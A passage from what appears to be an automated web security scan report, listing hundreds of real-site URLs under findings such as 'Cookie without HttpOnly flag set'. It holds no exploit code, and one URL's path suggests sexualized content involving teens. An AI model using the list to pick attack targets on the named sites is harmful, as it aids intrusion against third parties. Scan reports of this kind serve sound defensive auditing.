13.172. http://www.autotrader.com/no_cache/ac/trader_clicks_0006_nocount.asis

13.173. http://www.autotrader.com/no_cache/ac/trader_clicks_0009_nocount.asis

13.174. http://www.autotrader.com/no_cache/ac/trader_clicks_0016_nocount.asis

13.175. http://www.autotrader.com/research/certified-cars/index.jsp/x22

13.176. http://www.autotrader.com/research/index.jsp/x22

13.177. http://www.autotrader.com/research/new-cars/index.jsp/x22

13.178. http://www.autotrader.com/research/used-cars/index.jsp/x22

13.179. http://www.autotrader.com/x22/x3e/x3cli

13.180. http://www.autotraderclassics.com/find/index.xhtml/x22

13.181. http://www.autotraderclassics.com/x22

13.182. http://www.backtype.com/search

13.183. http://www.blip.tv/about/

13.184. http://www.blip.tv/blogs/

13.185. http://www.blip.tv/prefs/

13.186. http://www.care2.com/news/news_post.html

13.187. http://www.elmundo.es/

13.188. http://www.employmentguide.com/

13.189. http://www.facebook.com/

13.190. http://www.facebook.com/%s

13.191. http://www.facebook.com/2008/fbml

13.192. http://www.facebook.com/7NEWS

13.193. http://www.facebook.com/LIMEprpromo

13.194. http://www.facebook.com/abid.bahloul

13.195. http://www.facebook.com/apps/application.php

13.196. http://www.facebook.com/beirutcityguide

13.197. http://www.facebook.com/campaign/impression.php

13.198. http://www.facebook.com/campaign/landing.php

13.199. http://www.facebook.com/home.php

13.200. http://www.facebook.com/miofeghali

13.201. http://www.facebook.com/pages/Traverse-City-MI/CloudAccessnet/116931806748

13.202. http://www.facebook.com/paty.kfoury

13.203. http://www.facebook.com/profile.php

13.204. http://www.facebook.com/sharer.php

13.205. http://www.flickr.com/photos/aubalumni/4688630122/x22

13.206. http://www.flickr.com/photos/favoritltd/4795390303/

13.207. http://www.flickr.com/photos/favoritltd/4795390991/

13.208. http://www.flickr.com/photos/favoritltd/4795392149/

13.209. http://www.flickr.com/photos/favoritltd/4795392811/

13.210. http://www.flickr.com/photos/favoritltd/4796022554/

13.211. http://www.flickr.com/photos/favoritltd/4796024690/

13.212. http://www.forumas.lithuanianjoomla.com/download.php

13.213. http://www.google.com/finance

13.214. http://www.google.com/setprefs

13.215. http://www.google.com/url

13.216. http://www.groupon.com/washington-dc/subscribe

13.217. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x22

13.218. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

13.219. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared

13.220. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

13.221. http://www.homes.com/

13.222. http://www.jobalot.com/

13.223. http://www.linkedin.com/company/805465

13.224. http://www.livejournal.com/update.bml

13.225. http://www.newsvine.com/_wine/save

13.226. http://www.officedepot.com/promo.do

13.227. https://www.paypal.com/cgi-bin/webscr

13.228. http://www.tuenti.com/

13.229. https://www.tuenti.com/

13.230. http://www.veoh.com/videodetails2.swf

13.231. http://www.wireless.att.com/learn/articles-resources/community-support/recycling.jsp

13.232. http://www.youtube.com/

13.233. http://www.youtube.com/results

13.234. http://www.youtube.com/subscribe_widget

13.235. http://www.zazzle.com/netlingo

13.236. http://www1.whdh.com/

13.237. http://www3.whdh.com/mobile/phoneforecast/settings.php

13.238. http://xads.zedo.com/ads3/a

13.239. http://xfactor.tweetmeme.com/

13.240. http://yoga.tweetmeme.com/

13.241. http://youtube.tweetmeme.com/

14. Cookie without HttpOnly flag set

14.1. http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/

14.2. https://acc.newsguy.com/a/memsubmit.asp

14.3. http://advertising.aol.com/privacy/advertisingcom/opt-out

14.4. http://affiliate.kickapps.com/service/getWidget.kickAction

14.5. https://billing.cloudaccess.net/cart.php

14.6. http://cdn.beirut.com/GetImage.php

14.7. https://cloudaccess.infusionsoft.com/AddForms/processFormSecure.jsp

14.8. http://community.parenthood.com/feed/get/type/rss/source/domain/id/40337

14.9. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction

14.10. http://community.parenthood.com/service/searchEverythingAsRss.kickAction

14.11. http://dev.piwik.org/trac/browser/trunk/js/piwik.js

14.12. http://disqus.com/logout/

14.13. http://fastdial.com/

14.14. http://help.tweetmeme.com/

14.15. http://help.tweetmeme.com/2009/04/07/api-documentation/

14.16. http://help.tweetmeme.com/2009/04/09/rss-feeds/

14.17. http://help.tweetmeme.com/2009/04/09/twitter-feeds/

14.18. http://help.tweetmeme.com/contact/

14.19. http://help.tweetmeme.com/faq

14.20. http://help.tweetmeme.com/language/

14.21. http://investor.autobytel.com/

14.22. http://justintadlock.com/

14.23. http://justintadlock.com/archives/2008/04/13/cleaner-wordpress-gallery-plugin

14.24. http://kickapps.yuku.com/kickapps/service/getWidget.kickAction

14.25. http://lesterchan.net/

14.26. http://mad4milk.net/

14.27. http://netvouz.com/action/submitBookmark

14.28. http://news.cnet.com/

14.29. http://newsguy.com/

14.30. http://newsguy.com/accountbandwidth.htm

14.31. http://newsguy.com/accountemail.htm

14.32. http://newsguy.com/affiliate.htm

14.33. http://newsguy.com/allinone.htm

14.34. http://newsguy.com/birthday.htm

14.35. http://newsguy.com/bonusbytes.htm

14.36. http://newsguy.com/cellphone.htm

14.37. http://newsguy.com/commd6.htm

14.38. http://newsguy.com/contact.htm

14.39. http://newsguy.com/copy.htm

14.40. http://newsguy.com/diagnostics.htm

14.41. http://newsguy.com/email.htm

14.42. http://newsguy.com/groups.htm

14.43. http://newsguy.com/ispcon.htm

14.44. http://newsguy.com/javascript:LoginNow()

14.45. http://newsguy.com/members.htm

14.46. http://newsguy.com/msgpanel/message.asp

14.47. http://newsguy.com/news.asp

14.48. http://newsguy.com/news.htm

14.49. http://newsguy.com/newsguys.htm

14.50. http://newsguy.com/overview.htm

14.51. http://newsguy.com/policy.htm

14.52. http://newsguy.com/services.htm

14.53. http://newsguy.com/teraton_features.htm

14.54. http://newsguy.com/user_info.asp

14.55. http://sonspring.com/journal/clearing-floats

14.56. http://sourceforge.net/softwaremap/

14.57. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

14.58. http://t.mookie1.com/t/v1/imp

14.59. http://tenzing.fmpub.net/

14.60. http://themehybrid.com/themes/shadow

14.61. http://thenextweb.com/

14.62. http://tweetmeme.com/auth/login

14.63. http://twitter.com/

14.64. http://twitter.com/7News/

14.65. http://twitter.com/7News/newsteam

14.66. http://twitter.com/7News/status/29619600551317504

14.67. http://twitter.com/7news

14.68. http://twitter.com/Ihtirametna/status/12955399590252544/x22

14.69. http://twitter.com/LizPW/

14.70. http://twitter.com/LizPW/status/29620929206165504

14.71. http://twitter.com/amazon/x22

14.72. http://twitter.com/cw56

14.73. http://twitter.com/datasift

14.74. http://twitter.com/friendships/show.json

14.75. http://twitter.com/goodies/tweetbutton

14.76. http://twitter.com/joomla

14.77. http://twitter.com/kontentdesign

14.78. http://twitter.com/nbc/primetime

14.79. http://twitter.com/netlingo

14.80. http://twitter.com/nickhalstead/status/15837113167

14.81. http://twitter.com/share

14.82. http://twitter.com/spies_assassins

14.83. http://twitter.com/tweetmeme

14.84. http://twitter.com/typekit

14.85. http://twitter.com/ups

14.86. http://whdhstore.hipcricket.com/

14.87. http://www.123movers.com/

14.88. http://www.amazon.com/

14.89. http://www.amazon.com/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22

14.90. http://www.amazon.com/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22

14.91. http://www.amazon.com/b/

14.92. http://www.amazon.com/books-used-books-textbooks/b

14.93. http://www.amazon.com/dp/0313363153

14.94. http://www.amazon.com/dp/0814410960

14.95. http://www.amazon.com/dp/B000EFAO1G

14.96. http://www.amazon.com/dp/B001AIM6V2

14.97. http://www.amazon.com/dp/B0037UT1LY

14.98. http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b

14.99. http://www.amazon.com/gp/css/homepage.html/x22

14.100. http://www.amazon.com/gp/gc/x22

14.101. http://www.amazon.com/gp/product/0596804946

14.102. http://www.amazon.com/gp/site-directory/x22

14.103. http://www.amazon.com/music-rock-classical-pop-jazz/b

14.104. http://www.amazon.com/toys/b

14.105. http://www.amazon.com/wishlist/x22

14.106. http://www.amazon.com/x22

14.107. http://www.amazon.com/x22/x3e/x3cli

14.108. http://www.americascupmedia.com/index.php

14.109. http://www.aspirationtech.org/

14.110. http://www.aub.kg/x22

14.111. http://www.autocheck.com/

14.112. http://www.autotrader.com/

14.113. http://www.autotrader.com/ajax/backButtonFix.jsp

14.114. http://www.autotrader.com/hornav/trader/index.jsp

14.115. http://www.barkerstores.com/soundings/

14.116. http://www.beirut.com/

14.117. http://www.beneteaucountdown.com/

14.118. http://www.benjaminsterling.com/experiments/jqShuffle/

14.119. http://www.boats.com/

14.120. http://www.careersingear.com/

14.121. http://www.carmax.com/

14.122. http://www.carsdirect.com/x22

14.123. http://www.cdearth.com/photo-image-editor.htm

14.124. http://www.corporatehousing.com/

14.125. http://www.digitaltips.org/

14.126. http://www.diigo.com/post

14.127. http://www.directstartv.com/

14.128. http://www.dominionenterprises.com/main/do/Privacy_Policy

14.129. http://www.dominionenterprises.com/main/do/Terms_of_Use

14.130. http://www.dzone.com/links/add.html

14.131. http://www.ebayinc.com/content/press_release/ebay_selects_joomla_open_source_to_foste

14.132. http://www.experthost.com/

14.133. http://www.forrent.com/

14.134. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

14.135. http://www.homes.com/

14.136. http://www.hotelcoupons.com/

14.137. http://www.iloubnan.info/artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22

14.138. https://www.isc.org/software/inn

14.139. http://www.linkedin.com/company/805465

14.140. http://www.liutilities.com/affcb/

14.141. http://www.mathias-bank.de/

14.142. http://www.metacafe.com/fplayer/

14.143. http://www.mister-wong.com/index.php

14.144. http://www.myproductadvisor.com/mpa/autobytel/setCookie.do

14.145. http://www.myspace.com/Modules/PostTo/Pages/

14.146. http://www.myspace.com/netlingo

14.147. http://www.net-folio.net/

14.148. http://www.netlingo.com/log-out.php

14.149. http://www.netlingo.com/login.php

14.150. http://www.netlingo.com/register.php

14.151. http://www.netlingo.com/shop/index.php

14.152. http://www.netlingo.com/shop/shopping-cart.php

14.153. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue

14.154. http://www.newsguy.com/charity_chart.htm

14.155. http://www.newsguy.com/home_popupstatus.htm

14.156. http://www.newsguy.com/overview.htm

14.157. http://www.officedepot.com/promo.do

14.158. http://www.opensource.org/licenses/bsd-license.php

14.159. http://www.opensource.org/licenses/gpl-license.php

14.160. http://www.opensource.org/licenses/mit-license.php

14.161. http://www.packtpub.com/award

14.162. http://www.paperg.com/jsfb/embed.php

14.163. http://www.parenthood.com/

14.164. http://www.roomsaver.com/

14.165. http://www.sea-tec.it/

14.166. http://www.senioroutlook.com/

14.167. http://www.squidoo.com/lensmaster/bookmark

14.168. http://www.t-mobile.com/Company/Community.aspx

14.169. http://www.thisnext.com/pick/new/submit/sociable/

14.170. http://www.w-w-i.com/

14.171. http://www.w-w-i.com/velux_5_oceans_2010_race/

14.172. http://www.yachtscoring.com/event_results_cumulative.cfm

14.173. http://www3.whdh.com/mobile/phoneforecast/settings.php

14.174. http://a.tribalfusion.com/i.cid

14.175. https://acc.newsguy.com/user/-/accnt_billing

14.176. https://acc.newsguy.com/user/-/accnt_contact

14.177. https://acc.newsguy.com/user/-/accnt_flash

14.178. https://acc.newsguy.com/user/-/accnt_history

14.179. https://acc.newsguy.com/user/-/customer_referrals

14.180. https://acc.newsguy.com/user/-/referrals_cashout

14.181. https://acc.newsguy.com/user/accnt_overview

14.182. https://acc.newsguy.com/user/accnt_renew

14.183. https://acc.newsguy.com/user/accnt_settings

14.184. https://acc.newsguy.com/user/accnt_signup_usenet

14.185. https://acc.newsguy.com/user/accnt_upgrade

14.186. http://action.media6degrees.com/orbserv/hbpix

14.187. http://ad.doubleclick.net/click

14.188. http://ad.masjo.com/www/delivery/ajs.php

14.189. http://ad.masjo.com/www/delivery/ck.php

14.190. http://ad.masjo.com/www/delivery/lg.php

14.191. http://ad.turn.com/server/ads.js

14.192. http://ad.yieldmanager.com/pixel

14.193. http://ad.yieldmanager.com/unpixel

14.194. http://ads.adbrite.com/adserver/behavioral-data/8201

14.195. http://ads.dailystar.com.lb/www/delivery/afr.php

14.196. http://ads.dailystar.com.lb/www/delivery/ck.php

14.197. http://ads.dailystar.com.lb/www/delivery/lg.php

14.198. http://ads.doclix.com/adserver/CntImprImg

14.199. http://ads.pointroll.com/PortalServe/

14.200. http://ads.revsci.net/adserver/ako

14.201. http://ads.traderonline.com/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1

14.202. http://ads.traderonline.com/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1914196089@Right1

14.203. http://adserver.adtechus.com/bind

14.204. http://adserver.teracent.net/tase/ad

14.205. http://adserver.teracent.net/tase/redir/1295921988188_58040565_as2108_imp/vew

14.206. http://adserving.autotrader.com/js.ng/adsize=1x1&site=ntl&page=homepagegeosplash

14.207. https://adwords.google.com/select/Login

14.208. http://affiliate.kickapps.com/crossdomain.xml

14.209. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

14.210. http://as1.whdh.com/pan/adlog.php

14.211. http://as2.whdh.com/m/m.php/1295906131129/m.gif

14.212. http://at.amgdgt.com/ads/

14.213. http://autotrader.dealix.com/step1.asp

14.214. http://b.collective-media.net/seg/cm/de18_1

14.215. http://b.scorecardresearch.com/b

14.216. http://b.scorecardresearch.com/r

14.217. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

14.218. http://backend.parenthood.com/jscripts/p7EPMscripts.js

14.219. http://backend.parenthood.com/jscripts/shopblog_style05_master.css

14.220. http://backend.parenthood.com/s_code.js

14.221. http://bh.contextweb.com/bh/set.aspx

14.222. http://bid.openx.net/json

14.223. http://bid.openx.net/json

14.224. http://bid.openx.net/log

14.225. http://blogsearch.google.com/

14.226. http://books.google.com/bkshp

14.227. http://books.google.com/books

14.228. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.229. http://c7.zedo.com/OzoDB/cutils/R52_9/jsc/305/egc.js

14.230. http://c7.zedo.com/bar/v16-401/c5/jsc/gl.js

14.231. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html

14.232. http://click.linksynergy.com/fs-bin/click

14.233. http://code.google.com/p/swfobject/

14.234. http://community.joomla.org/

14.235. http://community.joomla.org/showcase/

14.236. http://community.joomla.org/showcase/how-to-submit-a-site.html

14.237. http://community.joomla.org/showcase/sites-of-the-month.html

14.238. http://community.joomla.org/showcase/sites/advsearch.html

14.239. http://community.joomla.org/showcase/sites/new.html

14.240. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction

14.241. http://comunidadjoomla.org/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html

14.242. http://cspix.media6degrees.com/orbserv/hbpix

14.243. http://d1.openx.org/afr.php

14.244. http://d1.openx.org/afr.php

14.245. http://d1.openx.org/ajs.php

14.246. http://d1.openx.org/lg.php

14.247. http://delb.opt.fimserve.com/fimbid/

14.248. http://demo.joomla.org/

14.249. http://demo16.cloudaccess.net/

14.250. http://demo16.cloudaccess.net/administrator/index.php

14.251. http://developer.joomla.org/

14.252. http://developer.joomla.org/security.html

14.253. http://developer.joomla.org/security/news.html

14.254. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23

14.255. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92

14.256. http://dm.de.mookie1.com/2/B3DM/DLX/@x94

14.257. http://dominionenterprises.112.2o7.net/b/ss/deparenthood/1/H.15.1/s24211537942755

14.258. http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.21/s27710598513465

14.259. http://dp.specificclick.net/

14.260. http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json

14.261. http://extensions.joomla.org/

14.262. http://extensions.joomla.org/extensions

14.263. http://extensions.joomla.org/extensions/advanced-search

14.264. http://extensions.joomla.org/extensions/languages/translations-for-joomla

14.265. http://extensions.joomla.org/extensions/new

14.266. http://flybase.org/reports/FBgn0000146.html/x22

14.267. http://forums.freebsd.org/

14.268. http://foxaudiencenetwork.122.2o7.net/b/ss/fan-foxaudience/1/H.20.3/s68358821158763

14.269. http://gegnia.com/joomla/informacion/mbrriti-joomla-1-pik-6

14.270. https://github.com/DataSift/TweetMeme-Chrome-Extension

14.271. http://goto.ext.google.com/og-dogfood-issue

14.272. http://goto.ext.google.com/og-exp

14.273. http://green.autobytel.com/

14.274. http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

14.275. http://groups.google.com/group/joomla-commits/topics

14.276. http://groups.google.com/groups

14.277. http://groups.google.com/grphp

14.278. http://gsas.harvard.edu/

14.279. http://hairmakeup.tweetmeme.com/

14.280. http://homepage.mac.com/yukikun/software/slimbox_ex/

14.281. http://howto.tweetmeme.com/

14.282. http://idpix.media6degrees.com/orbserv/hbpix

14.283. http://il.youtube.com/watch

14.284. http://images.google.com/images

14.285. http://iphone.tweetmeme.com/

14.286. http://joomfa.org/joomla-16-persian.html

14.287. http://joomla.jp/news/1-projectnews/169-joomla-16-has-arrived.html

14.288. http://joomla.pl/powiadomienia/577-joomla-16-wydany.html

14.289. http://joomladaywest.com/

14.290. http://joomladaywest.com/sponsors

14.291. http://joomladaywest.com/the-conference/keynote-speakers

14.292. http://joomlaportal.ru/content/view/2239/70/

14.293. http://js.revsci.net/gateway/gw.js

14.294. http://justinbieber.tweetmeme.com/

14.295. http://jxtended.com/

14.296. http://k.collective-media.net/cmadj/cm.martini/

14.297. http://khm0.google.com/kh/v/x3d76/x26

14.298. http://khm1.google.com/kh/v/x3d76/x26

14.299. http://khmdb0.google.com/kh

14.300. http://khmdb1.google.com/kh

14.301. http://kickapps.yuku.com/service/searchEverythingAsRss.kickAction

14.302. http://km-kh.com/km/joomla-news/63-joomlar-16-has-arrived.html

14.303. http://kontentdesign.com/

14.304. http://leadback.advertising.com/adcedge/lb

14.305. http://loadus.exelator.com/load/

14.306. http://magazine.joomla.org/

14.307. https://maps-api-ssl.google.com/maps

14.308. http://maps.google.com/maps

14.309. http://maps.google.com/maps/place

14.310. http://media.fastclick.net/w/pg

14.311. http://media.fastclick.net/w/tre

14.312. http://media.fastclick.net/w/win.bid

14.313. http://metrics.autobytel.com/b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011

14.314. http://metrics.traderonline.com/b/ss/detraderonline/1/H.17/s93964351669419

14.315. http://mig.nexac.com/2/B3DM/DLX/1@x96

14.316. http://my.joomla.org/

14.317. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3

14.318. http://news.webshots.com/photo/1059414821042998563QWNlxQ/x22

14.319. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/NaN/1930644746@Top,x01,x02,x03,x04,x05,Middle,Right1,Right2,Left,Left1,Left2,Left3,Bottom,Bottom1,Bottom2,Bottom3,BottomRight

14.320. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1029279147@Top,Middle,Right,Right1,x01,x02,x03,x04

14.321. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1033534934@Top,Middle,Right,Right1,x01,x02,x03,x04

14.322. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1044316774@Top,Middle,Right,Right1,x01,x02,x03,x04

14.323. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1046826505@Top,Middle,Right,Right1,x01,x02,x03,x04

14.324. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1047418271@Top,Middle,Right,Right1,x01,x02,x03,x04

14.325. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1055977740@Top,Middle,Right,Right1,x01,x02,x03,x04

14.326. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1079026132@Top,Middle,Right,Right1,x01,x02,x03,x04

14.327. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1116487764@Top,Middle,Right,Right1,x01,x02,x03,x04

14.328. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1117083037@Top,Middle,Right,Right1,x01,x02,x03,x04

14.329. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1118187308@Top,Middle,Right,Right1,x01,x02,x03,x04

14.330. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1128492533@Top,Middle,Right,Right1,x01,x02,x03,x04

14.331. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1133836899@Top,Middle,Right,Right1,x01,x02,x03,x04

14.332. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1139218526@Top,Middle,Right,Right1,x01,x02,x03,x04

14.333. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1167274727@Top,Middle,Right,Right1,x01,x02,x03,x04

14.334. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1209535023@Top,Middle,Right,Right1,x01,x02,x03,x04

14.335. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1216110988@Top,Middle,Right,Right1,x01,x02,x03,x04

14.336. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1225562716@Top,Middle,Right,Right1,x01,x02,x03,x04

14.337. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1239081530@Top,Middle,Right,Right1,x01,x02,x03,x04

14.338. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1241424720@Top,Middle,Right,Right1,x01,x02,x03,x04

14.339. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1251933878@Top,Middle,Right,Right1,x01,x02,x03,x04

14.340. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1264761221@Top,Middle,Right,Right1,x01,x02,x03,x04

14.341. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1271414808@Top,Middle,Right,Right1,x01,x02,x03,x04

14.342. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1273853013@Top,Middle,Right,Right1,x01,x02,x03,x04

14.343. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1280349904@Top,Middle,Right,Right1,x01,x02,x03,x04

14.344. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1319458490@Top,Middle,Right,Right1,x01,x02,x03,x04

14.345. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1326693698@Top,Middle,Right,Right1,x01,x02,x03,x04

14.346. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1341529874@Top,Middle,Right,Right1,x01,x02,x03,x04

14.347. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1347161569@Top,Middle,Right,Right1,x01,x02,x03,x04

14.348. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1357663315@Top,Middle,Right,Right1,x01,x02,x03,x04

14.349. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1361342262@Top,Middle,Right,Right1,x01,x02,x03,x04

14.350. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1376047824@Top,Middle,Right,Right1,x01,x02,x03,x04

14.351. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1413816750@Top,Middle,Right,Right1,x01,x02,x03,x04

14.352. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1415276276@Top,Middle,Right,Right1,x01,x02,x03,x04

14.353. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1460402778@Top,Middle,Right,Right1,x01,x02,x03,x04

14.354. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1469263568@Top,Middle,Right,Right1,x01,x02,x03,x04

14.355. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1533426917@Top,Middle,Right,Right1,x01,x02,x03,x04

14.356. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1557625622@Top,Middle,Right,Right1,x01,x02,x03,x04

14.357. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1560905621@Top,Middle,Right,Right1,x01,x02,x03,x04

14.358. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1568995865@Top,Middle,Right,Right1,x01,x02,x03,x04

14.359. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593404407@Top,Middle,Right,Right1,x01,x02,x03,x04

14.360. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1593605280@Top,Middle,Right,Right1,x01,x02,x03,x04

14.361. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1595740909@Top,Middle,Right,Right1,x01,x02,x03,x04

14.362. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1616048263@Top,Middle,Right,Right1,x01,x02,x03,x04

14.363. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1618634905@Top,Middle,Right,Right1,x01,x02,x03,x04

14.364. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1621737551@Top,Middle,Right,Right1,x01,x02,x03,x04

14.365. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1676341961@Top,Middle,Right,Right1,x01,x02,x03,x04

14.366. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1682116568@Top,Middle,Right,Right1,x01,x02,x03,x04

14.367. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1689149420@Top,Middle,Right,Right1,x01,x02,x03,x04

14.368. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1692074952@Top,Middle,Right,Right1,x01,x02,x03,x04

14.369. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1701891140@Top,Middle,Right,Right1,x01,x02,x03,x04

14.370. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1730151269@Top,Middle,Right,Right1,x01,x02,x03,x04

14.371. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1739497285@Top,Middle,Right,Right1,x01,x02,x03,x04

14.372. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1745603517@Top,Middle,Right,Right1,x01,x02,x03,x04

14.373. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1747984898@Top,Middle,Right,Right1,x01,x02,x03,x04

14.374. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1753370563@Top,Middle,Right,Right1,x01,x02,x03,x04

14.375. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1761257569@Top,Middle,Right,Right1,x01,x02,x03,x04

14.376. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1766138964@Top,Middle,Right,Right1,x01,x02,x03,x04

14.377. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1773027326@Top,Middle,Right,Right1,x01,x02,x03,x04

14.378. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1786991815@Top,Middle,Right,Right1,x01,x02,x03,x04

14.379. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1791676588@Top,Middle,Right,Right1,x01,x02,x03,x04

